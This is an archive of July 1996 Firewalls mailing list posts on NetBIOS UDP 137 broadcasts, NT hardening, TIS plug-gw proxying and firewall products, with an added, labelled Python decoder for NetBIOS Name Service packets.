Email - mgalati@beaumont.edu

From firewalls-owner Wed Jul 3 05:49:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16161 for firewalls-outgoing; Wed, 3 Jul 1996 05:42:03 -0700 (PDT) Received: from artemis.rus.uni-stuttgart.de (artemis.rus.uni-stuttgart.de [129.69.18.28]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA15981 for ; Wed, 3 Jul 1996 05:38:43 -0700 (PDT) Received: from info2.rus.uni-stuttgart.de (info2.rus.uni-stuttgart.de [129.69.18.15]) by artemis.rus.uni-stuttgart.de with SMTP id OAA24567 Received: by info2.rus.uni-stuttgart.de (AIX 3.2/UCB 5.64/4.03) Message-Id: <9607031234.AA29367@info2.rus.uni-stuttgart.de> Subject: Re: udp 137 broadcast from Win95 PC To: ishikawa@personal-media.co.jp Date: Wed, 3 Jul 1996 14:34:41 +0200 (MST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <9607031131.AA05717@sparc18.sun00net> from "Chiaki Ishikawa" at Jul 3, 96 08:31:20 pm From: Helmut Springer Organization: Stuttgart University, FRG X-Pgp-Fingerprint: AE 42 C3 2C A1 3E 55 6D B3 AC 3C D2 F3 CF FF E7 X-Phone: +49 711 685-2003q X-Fax: +49 711 685-2043 X-Mailer: ELM [version 2.4 PL25 PGP6] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Chiaki Ishikawa wrote:
> I looked up UDP 137 in some textbooks on TCP/IP and found no reference
> to the number 137.
>
> Can this safely be ignored?

netbios-ns 137/tcp # NETBIOS Name Service
netbios-ns 137/udp # NETBIOS Name Service

regards
delta
-- 
helmut 'delta' springer        Unix/Net Consulting, InfoSystems, StudBox
delta@RUS.Uni-Stuttgart.DE     Stuttgart University, FRG
http://home.pages.de/~delta/   phone : +49 711 685-2003    If you've got to do it,
                               FAX   : +49 711 685-2043    do it with cold blood...
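An added example for this thread, written for this archive and not posted by anyone on the list: a small Python decoder for the NetBIOS Name Service (UDP 137) datagrams that the netbios-ns entry above names. It builds two constructed packets in the RFC 1002 layout (a name query and a name registration, with host names, suffix bytes and a 192.0.2.54 address chosen here as test data) and parses them back: transaction ID, opcode, the B-node broadcast flag, the first-level-encoded name with its suffix byte, and for a registration the owner node type and the registered address. It also reports the UDP datagram size each packet would produce. On the assumption that the router's logged "length" counts the 8-byte UDP header, a bare name query comes to 58 bytes and a name registration to 76, which are the two sizes in the log quoted above.

```python
"""Decode NetBIOS Name Service (NBNS, UDP 137) packets per RFC 1001/1002.

Added example for this thread.  The two sample packets below are
constructed here, not captured from the poster's network.
"""
import struct

NBNS_PORT = 137
OPCODES = {0: "QUERY", 5: "REGISTRATION", 6: "RELEASE", 7: "WACK", 8: "REFRESH"}
UDP_HEADER_LEN = 8  # assumption: the router's "length" counts the UDP header too


def encode_name(name: str, suffix: int) -> bytes:
    """RFC 1002 first-level encoding: the name is padded with spaces to 15
    bytes and followed by a 1-byte suffix; every byte is split into two
    nibbles and each nibble is offset by ord('A').  Result is one 32-byte
    label (with its length byte) terminated by the root label."""
    if len(name) > 15:
        raise ValueError("NetBIOS names are at most 15 characters")
    raw = name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return bytes([32]) + bytes(encoded) + b"\x00"


def decode_name(buf: bytes, off: int):
    """Inverse of encode_name; returns (name, suffix, next_offset)."""
    if buf[off] != 32:
        raise ValueError("unexpected NetBIOS label length %d" % buf[off])
    enc = buf[off + 1: off + 33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    if buf[off + 33] != 0:
        raise ValueError("scope IDs are not handled in this example")
    return raw[:15].rstrip(b" ").decode("ascii"), raw[15], off + 34


def build_query(trn_id: int, name: str, suffix: int) -> bytes:
    """NAME QUERY REQUEST: 12-byte header + 34-byte name + type NB + class IN."""
    # flags: opcode 0, RD (0x0100) and B (0x0010) set; QDCOUNT=1
    hdr = struct.pack("!HHHHHH", trn_id, 0x0110, 1, 0, 0, 0)
    return hdr + encode_name(name, suffix) + struct.pack("!HH", 0x0020, 0x0001)


def build_registration(trn_id: int, name: str, suffix: int, ip: str) -> bytes:
    """NAME REGISTRATION REQUEST: query section plus one additional RR
    carrying NB_FLAGS (B-node, unique name) and the registering address."""
    hdr = struct.pack("!HHHHHH", trn_id, 0x2910, 1, 0, 0, 1)  # opcode 5, RD|B, ARCOUNT=1
    question = encode_name(name, suffix) + struct.pack("!HH", 0x0020, 0x0001)
    rdata = struct.pack("!H4B", 0x0000, *(int(o) for o in ip.split(".")))
    # RR: pointer to the question name (0xC00C), type NB, class IN, TTL, RDLENGTH
    rr = struct.pack("!HHHIH", 0xC00C, 0x0020, 0x0001, 300000, len(rdata)) + rdata
    return hdr + question + rr


def parse_nbns(pkt: bytes) -> dict:
    """Pull out the fields a firewall admin wants from an NBNS datagram."""
    trn_id, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    opcode = (flags >> 11) & 0x0F
    out = {"trn_id": trn_id, "opcode": OPCODES.get(opcode, str(opcode)),
           "broadcast": bool(flags & 0x0010), "udp_len": len(pkt) + UDP_HEADER_LEN}
    off = 12
    if qd:
        out["name"], out["suffix"], off = decode_name(pkt, off)
        off += 4  # QUESTION_TYPE, QUESTION_CLASS
    if ar:
        # RR layout: name pointer (2), type (2), class (2), TTL (4), RDLENGTH (2), RDATA
        rdlen = struct.unpack("!H", pkt[off + 10: off + 12])[0]
        rdata = pkt[off + 12: off + 12 + rdlen]
        nb_flags = struct.unpack("!H", rdata[:2])[0]
        out["owner_node_type"] = {0: "B", 1: "P", 2: "M", 3: "H"}[(nb_flags >> 13) & 0x3]
        out["address"] = ".".join(str(b) for b in rdata[2:6])
    return out


def sample_packets() -> dict:
    """Constructed stand-ins for the two broadcast sizes in the poster's log."""
    return {"query": build_query(0x1234, "WORKGROUP", 0x1D),
            "registration": build_registration(0x1235, "PC54", 0x00, "192.0.2.54")}


if __name__ == "__main__":
    for kind, pkt in sample_packets().items():
        print(kind, parse_nbns(pkt))
```

The 0x1D and 0x00 suffixes, the two names and the address are constructed test data; the decoder handles only the plain broadcast forms (no scope ID, no compressed names beyond the 0xC00C pointer). The practical point for the router log is that a steady stream of REGISTRATION/REFRESH broadcasts from one host is the normal noise of a B-node announcing itself, while the same datagrams arriving from outside the perimeter mean the filter is letting port 137 through.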
From firewalls-owner Wed Jul 3 06:04:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA17167 for firewalls-outgoing; Wed, 3 Jul 1996 05:57:10 -0700 (PDT) Received: from cyber3.servtech.com (cyber3.servtech.com [199.1.22.25]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA17138 for ; Wed, 3 Jul 1996 05:56:50 -0700 (PDT) From: dan@burkegroup.com Received: from burke.burkegroup.com (burke.roc.servtech.com [206.106.148.165]) by cyber3.servtech.com (8.7.5/8.7.5) with SMTP id IAA13103 for ; Wed, 3 Jul 1996 08:54:08 -0400 (EDT) Received: from Connect2 Message Router by burke.burkegroup.com Message-ID: <271DAA3101523000@burke.burkegroup.com> Date: Wed, 3 Jul 96 8:40:06 -0500 Organization: Burke Group To: firewalls@greatcircle.com Subject: Re: NT Backoffice "Catapult" firewall certified? MIME-Version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7BIT X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Ron DuFresne said:
> >
> > I have no problem with firewalls that are so easy to administer, etc.,
> > BUT, generally, the people who set up these easy-to-use firewalls
> > don't know/think about things like disabling the guest account
> > (I know, lame example), or setting permissions on shares (or disabling
> > all shares, or whatever), etc., and if the firewall software doesn't
> > do this for them, then their firewall host can be easily compromised....
> >
> > It takes time and knowledge (well, more like common sense) to make an NT box
> > secure(ish). We all know that a large majority of people who insist on NT
> > because of its ease of use, and requirement for little-to-no knowledge
> > of system administration and security, don't have the time and knowledge
> > to secure their box.
[snip]

Is there a FAQ or other resources for necessary NT security measures in addition to the firewall?

Dan Lenhard

From firewalls-owner Wed Jul 3 06:21:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA18222 for firewalls-outgoing; Wed, 3 Jul 1996 06:07:26 -0700 (PDT) Received: from sun.aitc.rest.tasc.com (sun.aitc.rest.tasc.com [147.81.50.129]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA18213 for ; Wed, 3 Jul 1996 06:07:18 -0700 (PDT) Received: from iwdc1.office.rest.tasc.com by sun.aitc.rest.tasc.com (NX5.67e/NX3.0M) Received: from iwdc1.office.rest.tasc.com by iwdc1.office.rest.tasc.com (4.1/SMI-4.1) Message-Id: <9607031305.AA07147@iwdc1.office.rest.tasc.com> X-Mailer: exmh version 1.6.6 3/24/96 To: ishikawa@personal-media.co.jp Cc: Firewalls@greatcircle.com Subject: Re: udp 137 broadcast from Win95 PC In-Reply-To: Your message of "Wed, 03 Jul 1996 20:31:20 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 03 Jul 1996 09:05:19 -0400 From: Bob Bowes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Chiaki Ishikawa wrote:
> PMC e-mail id: 4579
>
> Hello.
>
> Recently, I found that a Windows-95 PC located in our DMZ
> broadcast udp (port=137) packets in DMZ, which
> subsequently showed up in CISCO router log file.
> Below is a summary produced from the cisco log for one day.
> [Deleted]

Port 137 is used to tunnel MS networking protocols over IP (to support an NT network with IP). I think ports 138 and 139 are also used for NetBEUI and something else. These ports should definitely NOT be passed through your router/firewall to the Internet.

Bob

From firewalls-owner Wed Jul 3 06:30:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16014 for firewalls-outgoing; Wed, 3 Jul 1996 05:39:04 -0700 (PDT) Received: from wintermute.imsi.com (wintermute.imsi.com [206.181.239.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA15986 for ; Wed, 3 Jul 1996 05:38:55 -0700 (PDT) From: robc@webster.imsi.com Received: from relay.imsi.com by wintermute.imsi.com Received: from gt-40 by relay.imsi.com Message-Id: <960703083613.ZM2855@gt-40> Date: Wed, 3 Jul 1996 08:36:02 -0700 In-Reply-To: ishikawa@sparc18.personal-media.co.jp (Chiaki Ishikawa) References: <9607031131.AA05717@sparc18.sun00net> X-Mailer: Z-Mail 4.0.1 (4.0.1 Apr 9 1996) To: ishikawa@personal-media.co.jp, Firewalls@GreatCircle.COM Subject: Re: udp 137 broadcast from Win95 PC Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

The Microsoft services use UDP 137 and 138 and TCP 139. Look in the RFCs on NetBIOS over TCP/IP for more info.

robc
-- 
Robert L. Carbone
Systems Administrator
Email : robc@imsi.com
Phone : (212)339-2742
Investment Management Services Inc.
That Which Does Not kill you Makes you hurt that much longer !
-----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBNAzGA9jYAAAECAOJPmTRxeczPVvJsqV3Jc1hAJsAu19x+nm5yAj9IlBCTBZEE AjAFvi7Q15QnehJaL2p7f40Kj9CkNNTCBgMy31kABRG0E3JvYmM8cm9iY0BpbXNp LmNvbT4= =j6L1 -----END PGP PUBLIC KEY BLOCK----- From firewalls-owner Wed Jul 3 06:34:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16312 for firewalls-outgoing; Wed, 3 Jul 1996 05:44:46 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA16299 for ; Wed, 3 Jul 1996 05:44:24 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id OAA08816; Wed, 3 Jul 1996 14:37:21 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31DA69AB.335E@apogee-com.fr> Date: Wed, 03 Jul 1996 14:38:03 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: ishikawa@personal-media.co.jp Cc: Firewalls@GreatCircle.COM Subject: Re: udp 137 broadcast from Win95 PC References: <9607031131.AA05717@sparc18.sun00net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chiaki Ishikawa wrote: > > PMC e-mail id: 4579 > > Hello. > > Recently, I found that a Windows-95 PC located in our DMZ > broadcast udp (port=137) packets in DMZ, which > subsequently showed up in CISCO router log file. > Below is a summary produced from the cisco log for one day. > > >UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=58 3 times > >UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=76 162 times > **** culprit win 95 PC **** > > I looked up UDP 137 in some textbooks on TCP/IP and found no reference > to the number 137. > > Can this safely be ignored? 
> > -- > Ishikawa, Chiaki ishikawa@personal-media.co.jp > (family name, given name) > Personal Media Corp. > Shinagawa, Tokyo, Japan 142The ports # 137 and 138 are used by NetBios on IP. The Broadcasts are used to announce its presence, and learn about possible servers available. (well this is an ugly summary of the whole stuff...) Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Wed Jul 3 06:49:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21046 for firewalls-outgoing; Wed, 3 Jul 1996 06:39:08 -0700 (PDT) Received: from magneto.acquion.com (magneto.acquion.com [206.154.17.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA21026 for ; Wed, 3 Jul 1996 06:39:00 -0700 (PDT) Received: from wolverine.acquion.com ([206.154.17.12]) Message-Id: <2.2.32.19960703133616.006f0da0@mail.acquion.com> X-Sender: oolid@mail.acquion.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jul 1996 09:36:16 -0400 To: firewalls@greatcircle.com From: oolid@acqic.org (Joseph L. Moll) Subject: Re: udp 137 broadcast from Win95 PC Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:31 PM 7/3/96 JST, you wrote: >>UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=58 3 times >>UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=76 162 times > **** culprit win 95 PC **** This is how NetBeui works on TCP/IP, usually called NBT or recently CIFS (Common Internet File System, (C) M$). NBT (CIFS) uses UDP ports 137 and 138, and TCP port 139. UDP port 137 is specifically the name services port. 
UDP(138) is the datagram port; but in my experience it is rarely used and is not required for connectivity. TCP port 139 is the SMB (server message block) port and handles the data transactions.

This machine is broadcasting its name for use on that segment. All NBT servers/clients listen on UDP 137 to build their name cache.

Your router should not forward these broadcasts; however, you should not allow access to these ports on your DMZ unless you want all the hosts on the InterNET to be able to access your Windows Networking services, especially since Win95 is not exactly secure in the first place. An enterprising person could gain access to your Windows machine via TCP port 139 and possibly UDP port 138 if they are left unsecured.

Best Regards,
---
Joseph L. (Joe) Moll -- Network and Communications Engineering
mailto:oolid@acqic.org   http://www.acquion.com
ACQUION, Inc. Greenville, SC USA -- Specialists in Electronic Commerce
disclaimer: This email is not to be considered official correspondence

From firewalls-owner Wed Jul 3 07:04:21 1996
From: "Mike Stoico"
Date: Wed, 3 Jul 1996 09:52:49 -0400
To: "Bob Bowes"
Cc: "Firewalls"
Subject: Re: udp 137 broadcast from Win95 PC

Bob,
>
> Port 137 is used to tunnel MS networking protocols
> over IP (to support an NT
> network with IP). I think ports 138 and 139 are also used for NetBEUI and
> something else. These ports should definitely NOT be passed through your
> router/firewall to the Internet.
>

What are the exposures involved in letting these pass through?

--
Mike Stoico, I/S Security Consultant, MetLife, 500 Jordan Rd, Troy, NY 12180
Phone: (518)285-2567   Fax: (518)285-2542   E-Mail: mstoico@metlife.com   URL: www.metlife.com
The opinions expressed here are my own and may not be those of my employer.

From firewalls-owner Wed Jul 3 07:22:09 1996
From: "Gary Lynch"
Date: Wed, 3 Jul 96 14:00:25 UT
To: "CyberEyes"
Cc: firewalls@GreatCircle.COM
Subject: RE: Training???

You might try MIS Training Institute (508) 879-7999. They specialize in security training. As a second choice, you might want to look at Computer Security Institute (415) 905-2626. Both hold 1/2 day classes around the country. Unfortunately, they're not cheap (usually $850 or so for two days).....

----------
From: firewalls-owner@GreatCircle.COM on behalf of CyberEyes
Sent: Tuesday, July 02, 1996 11:40 AM
Cc: firewalls@GreatCircle.COM
Subject: Re: Training???
On Tue, 2 Jul 1996, David Tate wrote:

> I am looking for IS Security/Firewalling/Network Protection training in MA,
> in the month of July. Would anyone be able to recommend such training?

If anyone knows of the same kind of things in Quebec/Ontario, I'd appreciate knowing about it... Thanks.

Ryan A. Rowe - Montreal, Quebec   aka CyberEyes, Rubik'S Cube
Tel. -> +1-514-626-0328   E-Mail -> cyberia@cam.org   WWW -> http://www.cam.org/~cyberia
IRC -> #CAli4NiA, #Triathlon, #Surfing   FTP -> ftp.cam.org /users/cyberia
/Seeking Internet-related job./ Read my RESUME on my home page! "I may not know everything, but I'm willing to learn." Will relocate _ANYWHERE_ in North America. "Everyone has their day, mine is July 15th, 1998."

From firewalls-owner Wed Jul 3 07:34:19 1996
From: Michael Ryan
Reply-To: mike@networx.ie
Organization: I.T. NetworX Ltd, 67 Merrion Square, Dublin 2, Ireland
Date: Wed, 3 Jul 1996 15:11:47 BST
To: Firewalls
Subject: URL for tcpshow

As a result of my original posting to this list re tcpshow, I received many requests for the source code. David Wagner has graciously donated some of his disk space to host tcpshow.c.
The program is available for download at http://www.cs.berkeley.edu/~daw/mike/tcpshow.c

I'll follow up with a man page for the program in a day or so. You'll find the man page in the same directory once I've written it.

Thanks to David.

Mike
---

From firewalls-owner Wed Jul 3 08:04:46 1996
From: Yasin Shaikh
Organization: Nesbitt Burns Inc.
Date: Wed, 03 Jul 1996 10:53:41 -0400
To: firewalls@greatcircle.com
Subject: Integrating Reuters Service thru TIS Toolkit

I would like to know if someone has written a proxy using the TIS Toolkit to allow Reuters Services for the brokerage industry (not Real Time feed) to proxy thru the firewall (built using TIS Toolkit and Socks). Their tech guy says any generic proxy can be used. What is a generic proxy? Is it available with TIS Toolkit? Reuters are only specifying the ports which the proxy will connect to.

Any suggestions, advice will be appreciated.

Thanks
yasin
--
Nesbitt Burns Inc.
Tel: 416-359-5164   email: yasin@nesbittburns.ca

From firewalls-owner Wed Jul 3 08:37:43 1996
From: Charles Ragan
Date: Wed, 03 Jul 1996 09:19:42 -0500
To: dan@burkegroup.com
Cc: firewalls@GreatCircle.COM
Subject: Re: NT Backoffice "Catapult" firewall certified?

http://www.somarsoft.com/

At 08:40 AM 7/3/96 -0500, dan@burkegroup.com wrote:
>
>Ron DuFresne said:
>> >
>> > I have no problem with firewalls that are so easy to administer, etc,
>> > BUT, generally, the people who setup these easy-to-use firewalls,
>> > don't know/think about things like disabling guest account
>> > (I know, lame example), or setting permissions on shares (or disabling
>> > all shares, or whatever), etc, and if the firewall software doesn't
>> > do this for them, then their firewall host can be easily compromised....
>> >
>> > It takes time and knowledge (well, more like common sense) to make an NT box
>> > secure(ish). We all know that a large majority of ppl who insist on NT
>> > because of its ease of use, and requirement for little-to no knowledge
>> > of system administration and security, don't have the time and knowledge
>> > to secure their box.
>[snip]
>
>Is there a FAQ or other resources for necessary NT security
>measures in addition to the firewall?
>
>Dan Lenhard
>

__________________________________________________________
Charles Ragan, Jr.   International Network Services
CCIE #1764, MCSE, MCNE, CBE   Pager - 1-800-INS-1-INS
Using NT Server 4.0 Beta2 & Eudora 2.2(32)
___________________________________________________________

From firewalls-owner Wed Jul 3 08:49:13 1996
From: "Hicks, Rick"
Date: Wed, 3 Jul 1996 11:40:00 -0500
To: "'Firewalls List'"
Subject: RE: Reading news via a firewall

> I'm looking for a simple solution for reading news via a firewall. I've
>a Linux firewall set up on our local network and lot of PCs running Win
>3.x, Win95 and/or WinNT Workstations on the protected network. The
>problem is that the machines on the protected network must be able to
>read news via/through the firewall at the news host. Is there a
>simple/good solution for a Linux firewall? A gateway or something? If so,
>what news agents do support that gateway solution?
>
>Hope someone can help me, best regards, Gunni
>

An easy solution is to use the plug-gw proxy that is in the TIS firewall toolkit (ftp.tis.com). It is perfect for news: it accepts connections to port 119 (or any port you wish to assign) and forwards everything to another host and port (the desired news server). Then you just tell the clients that the firewall is the news server and they will work as if they are connected to the external news server.

Rick
________________________________________________
Rick Hicks, Systems Specialist, Hussmann Corporation
rhicks@hussmann.com   http://www.hussmann.com

From firewalls-owner Wed Jul 3 09:19:26 1996
From: ken@bridge.com
Date: Wed, 3 Jul 1996 11:12:20 -0500 (CDT)
To: firewalls@GreatCircle.COM, RHicks@hussmann.com
Cc: gunni@if.is
Subject: RE: Reading news via a firewall

>From: "Hicks, Rick"
>An easy solution is to use the plug-gw proxy that is in the TIS firewall
>toolkit (ftp.tis.com). It is perfect for news, it accepts connections to
>port 119 (or any port you wish to assign) and forwards everything to
>another host and port (the desired news server).
>Then you just tell the
>clients that the firewall is the news server and they will work as if
>they are connected to the external news server.

The downside is that it can only be configured to connect to a single machine (which can differ based on who on the inside is connecting to it); this works well if you've a single news server that you want to connect to on the outside. But if you need to connect to a second news server, like msnews.microsoft.com (leave it to MS to screw up Usenet with their $#!@ non-propagating microsoft.* newsgroups), you'll need to set up a second plug-gw configuration listening on another port (like 120 or whatever) to connect to msnews.microsoft.com:119 (or wherever).

BUT not all news readers let you specify non-standard ports, though you can make Netscape do it. I think Netscape semi-elegantly handles multiple servers, too; other (otherwise better) news readers won't always be able to handle the differences in available groups very well when you switch between servers (but that's not a firewall issue.)
-KH

From firewalls-owner Wed Jul 3 10:22:19 1996
From: nreadwin@london.micrognosis.com (Neil Readwin)
Date: Wed, 3 Jul 1996 18:11:19 +0100 (BST)
To: yshaikh@nesbittburns.ca (Yasin Shaikh)
Cc: firewalls@greatcircle.com
Subject: Re: Integrating Reuters Service thru TIS Toolkit

Yasin Shaikh writes:
> I would like to know if some one has written a proxy using the TIS
> Toolkit to allow Reuters Services for the brokerage industry( not Real
> Time feed) to proxy thru the firewall

If you mean RQF / RSF etc then the TIS fwtk plug-gw works well for this - we do this on our internal nets.

Neil.
--
"So you could say the greatest achievement of the Internet is that it turns nuclear war into nothing more than a series of routing errors."
-- Mark Pesce

From firewalls-owner Wed Jul 3 10:49:36 1996
From: flounder@unm.edu (--Flounder--)
Date: Wed, 3 Jul 96 11:33 MDT
To: cyberia@CAM.ORG, forcible_entry@msn.com
Cc: firewalls@GreatCircle.COM
Subject: RE: Training???

Learning Tree was mentioned as a possible place for training. I found their web site: http://www.learningtree.com

Gives details on everything from classes offered to when they take place and tuition rates.

Scott

From firewalls-owner Wed Jul 3 11:04:34 1996
From: Jean-Francois Zwobada
Organization: APOGEE Communications
Date: Wed, 03 Jul 1996 19:27:00 +0200
To: Yasin Shaikh
Cc: Firewalls@greatcircle.com
Subject: Re: Integrating Reuters Service thru TIS Toolkit
Hi,

There is a generic proxy in the TIS toolkit named 'plug-gw'. This proxy is designed to accept a connection on a well-known port number and relay all the traffic to the real destination. The usual example is to use plug-gw as a relay for the News (port 119) between an internal server and the external server.

The plug-gw can be configured in a many-to-one manner:

    plug-gw: port nntp 1.2.3.* -plug-to server -port 119

and the Gauntlet version can support many-to-many connections such as:

    plug-gw: port nntp 1.2.3.* -port nntp

where you don't specify the real destination to plug to. But I don't know if the Toolkit can do it.

If your application uses a single TCP connection on a defined port number then you can use the plug-gw. I've used it for such an application at a customer site.

Jean-Francois
--
Jean-Francois Zwobada, Apogee Communications
Parc Club Universite, 28, rue Jean Rostand, 91893 ORSAY Cedex
Tel : +33 (1) 69 85 56 47   Fax : +33 (1) 69 85 56 48
e-mail : zwobada@apogee-com.fr

From firewalls-owner Wed Jul 3 11:34:57 1996
Date: Wed, 3 Jul 1996 11:26:10 -0700
To: Firewalls@GreatCircle.COM
From: Bill Stout
Subject: Re: /etc/shadow encryption

At 09:55 AM 7/3/96 EST, you wrote:
>Michael Ryan writes:
>> Forgive me if I'm wrong, but I believe the crypt() function is not
>> exported outside the U.S. and I note the requestor is
>> outside the U.S., so his Un*x probably doesn't have it.
>
>In this case you are wrong, but are forgiven. The crypt program and other
>reversible encryption tools for Unix can't be exported, but the crypt routine
>(i.e. crypt(3)) is exportable, because it is a one-way "encryption" (i.e.
>you can't get the original info back).
>
> Frank Crawford

AHA! That sheds some light on the one-way-function passwords in NT... :) (Just convert the password into some binary and pass that binary string around for authentication, no one will be the wiser...)

Bill Stout

From firewalls-owner Wed Jul 3 12:34:15 1996
From: Scanner
Date: Wed, 3 Jul 1996 15:15:49 -0400 (EDT)
To: Uldis Bojars
cc: firewalls@GreatCircle.COM
Subject: Re: OS/2 firewalls?

On Wed, 3 Jul 1996, Uldis Bojars wrote:

> Hi!
>
> I am searching for OS/2 firewalls - are there any? It's
> very hard to find, but I think there are some. Of course
> I do not want OS/2 because I want to use firewall as a
> workstation ;-)

Don't know any for OS/2.
> And - if negative - what are good firewalls for freeBSD?
> Our company is not so big to buy Sun or HP UNiX computer
> and use it as a firewall.

There is native ipfw, a packet filter built into FreeBSD. There is also supposedly, I think, ipfilter for FreeBSD, either in the works or out there somewhere.

--
Webspan Inc., ISP Division.   500 West Kennedy Blvd., Lakewood, NJ-08701
Phone: 908-367-8030 ext. 126   E-Mail: scanner@webspan.net
SysAdmin / Network Engineer / Security   Member BSDNET team! http://www.bsdnet.org
FreeBSD 2.1.0 is available now! Turning PCs into Workstations   http://www.freebsd.org

From firewalls-owner Wed Jul 3 13:50:42 1996
From: Bill Stout
Date: Wed, 3 Jul 1996 13:31:17 -0700
To: Firewalls@GreatCircle.COM
Subject: Computer risk lists

What risk lists are recommended by the collective? This is one cool list: http://catless.ncl.ac.uk/Risks

BTW - I thought HERF guns were fantasy! Network World - 7/1/96 p.8 'CIA cyber-war center'

Bill Stout
--
William B.
Stout | Senior Systems Admin, Hitachi Data Systems | NT/UNIX/I-net/Routers | 408-970-4822
Major revelations: "All objects are part of a larger object." "3 aware beings comprise a person; mind, body, spirit." "The secret of life: To be involved with 'creation'." Infowar, Cyber-war, yes, 'they' are out to get you...
--------------------------------------------------------------------------------

From firewalls-owner Wed Jul 3 14:19:06 1996
From: AKRUMSEE@ncgroup.com (Art Krumsee)
Date: Wed, 3 Jul 1996 16:53:39 -0400
To: "'Firewalls@GreatCircle.COM'"
Subject: RE: Catapault firewall

While you are checking out web pages I'd suggest that you take a look at a new "firewall" from MCI and Intel. Called Webmaker, this is claimed to be a firewall/web server/router all in one Pentium system. The claim is that You will enjoy the following quotes from the web page.

Art

"Up and running in an hour with a total solution
The networkMCI WebMaker is truly the best route to doing business on the Internet. It comes with all the hardware and software necessary for a secure Internet presence. It's installed with leased line Internet service from MCI. It's a total solution that's all preconfigured and ready to go.
Built-in software wizards and pre-designed templates let you develop a "look" that suits your business and customize your site with information specific to your company. In short, it's so well thought out that most networkMCI WebMaker sites are on line, accessible to anyone with web access anywhere in the world, in about an hour."

"No UNIX experts required
Today's Pentium Pro processor-based servers give you a familiar Windows-based platform for your Internet server. So why add another technology to your worries? The networkMCI WebMaker can be used and maintained easily by anyone familiar with PCs and Windows NT operating system. Chances are, you have more than one such person on staff. Using somebody already on staff is much less expensive than having to hire another employee or constantly bringing in an outside consultant every time something needs to be fixed or changed."

"Safe and secure
The networkMCI WebMaker features an integrated router and Proxy Server forming a security firewall. The built-in packet-filtering router and Web Proxy Server provide secure Internet access and a secure presence for your business. Having these components integrated into a turnkey solution saves you from having to buy additional external routers and proxy servers costing thousands of dollars. It also eliminates the need for expensive technical specialists to install them. The end result? By design, only allowed services such as HTTP and e-mail are enabled, maximizing safety, enforcing a conservative security policy, and giving you the current standard in Internet security for a fraction of the usual price."

"The bottom line
The networkMCI WebMaker solution is unique. It integrates the proven components with secure Internet connectivity, comprehensive administration and ease of use.
You get:
- Pentium Pro processor-based system, loaded and pre-configured with all necessary communication hardware and Internet services software
- Integrated security firewall with a packet-filtering router and Proxy Server
- Capacity for scalable leased line Internet connectivity from 56 Kbps to full T-1 speed
- Secure Web presence (Web and e-mail) and real-time Internet access for TCP/IP LAN users (Web, e-mail, FTP)
- Easy-to-use tools for installation, Web site creation and site promotion
- Intuitive WebMaker Management Console running over Windows NT operating system
- Web Back-end Online Service for integrated product support"

----------
From: Marcus J. Ranum[SMTP:mjr@clark.net]
Sent: Monday, July 01, 1996 9:39 PM
To: Firewalls@GreatCircle.COM
Subject: Re: Catapault firewall

I pulled down Microsoft's page on Catapult. I urge you all to do so and give it a read. From where I sit, it looks like the firewall market has reached its next level, with this announcement.

The brief on Microsoft's page is completely content-free. Several times, Catapult is recommended as the solution because it's secure. Nothing about why it's secure or how it's secure. Don't bother your head with that stuff! It's SECURE, OK? ...Or at least as secure as a beta product that only runs on a beta version of NT can be.

